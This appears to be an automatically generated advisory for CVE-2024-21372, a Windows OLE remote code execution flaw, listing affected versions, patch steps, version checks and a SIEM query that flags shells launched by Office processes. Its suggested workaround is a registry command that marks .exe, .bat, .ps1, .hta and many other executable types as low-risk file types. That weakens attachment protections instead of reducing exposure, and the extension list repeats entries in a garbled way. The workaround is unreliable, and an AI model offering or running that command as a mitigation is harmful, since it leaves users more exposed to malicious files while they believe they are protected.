CVE-2024-21372
📋 TL;DR
This vulnerability allows remote attackers to execute arbitrary code on affected Windows systems through malicious OLE objects. It affects Windows systems with OLE functionality enabled, primarily impacting users who open untrusted documents or visit malicious websites.
💻 Affected Systems
- Microsoft Windows
📦 What is this software?
Windows 10 1507 by Microsoft
Windows 10 1607 by Microsoft
Windows 10 1809 by Microsoft
Windows 10 21h2 by Microsoft
Windows 10 22h2 by Microsoft
Windows 11 21h2 by Microsoft
Windows 11 22h2 by Microsoft
Windows 11 23h2 by Microsoft
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise with administrative privileges, data exfiltration, ransomware deployment, and lateral movement across networks.
Likely Case
Malware installation, credential theft, and persistence establishment on individual workstations.
If Mitigated
Limited impact due to application sandboxing, reduced privileges, and network segmentation.
🎯 Exploit Status
Exploitation requires user interaction (opening malicious document or visiting malicious site). No public exploit code available at this time.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: February 2024 security updates
Vendor Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21372
Restart Required: Yes
Instructions:
1. Apply February 2024 Windows security updates via Windows Update. 2. For enterprise environments, deploy updates through WSUS or SCCM. 3. Restart systems after patch installation.
🔧 Temporary Workarounds
Disable OLE Package Execution
windowsPrevents OLE packages from executing, reducing attack surface
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.inf;.chm;.msi;.reg;.js;.vbs;.wsf;.wsh;.jse;.vbe;.hta;.pdf;.gif;.png;.jpg;.zip;.rar;.htm;.html;.xml;.xsl;.mht;.mhtml;.url;.lnk;.js;.jse;.vbs;.vbe;.wsf;.wsh;.ps1;.ps1xml;.ps2;.ps2xml;.psc1;.psc2;.msh;.msh1;.msh2;.mshxml;.msh1xml;.msh2xml;.scf;.scr;.sct;.shb;.shs;.pif;.cpl;.application;.gadget;.msp;.msi;.mst;.idq;.ida;.idc;.shtm;.shtml;.stm;.printer;.pcd;.htw;.htr;.idc;.htt;.htx;.asp;.aspx;.cer;.asa;.asax;.ascx;.ashx;.asmx;.axd;.cs;.csproj;.vb;.vbproj;.config;.master;.sitemap;.skin;.browser;.webinfo;.licx;.resx;.resources;.mdb;.mde;.mdf;.ldf;.adp;.ade;.accdb;.accde;.accdt;.accdr;.mam;.maq;.mar;.mas;.mat;.mau;.mav;.maw;.mda;.mdb;.mde;.mdt;.mdw;.mdz;.mpp;.mpt;.mpd;" /f
🧯 If You Can't Patch
- Implement application whitelisting to prevent unauthorized executables
- Use network segmentation to isolate vulnerable systems and restrict lateral movement
🔍 How to Verify
Check if Vulnerable:
Check if February 2024 security updates are installed via Windows Update or systeminfo commandCheck Version:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"Verify Fix Applied:
Verify KB5034765 (or later) is installed for affected Windows versions📡 Detection & Monitoring
Log Indicators:
- Windows Event Logs showing OLE activation failures
- Process creation from OLE-related executables
- Unusual document file access patterns
Network Indicators:
- Outbound connections from Office applications to unusual destinations
- DNS queries for malicious domains from document-related processes
SIEM Query:
source="windows" event_id=4688 process_name="cmd.exe" OR process_name="powershell.exe" parent_process_name="*office*" OR parent_process_name="*ole*"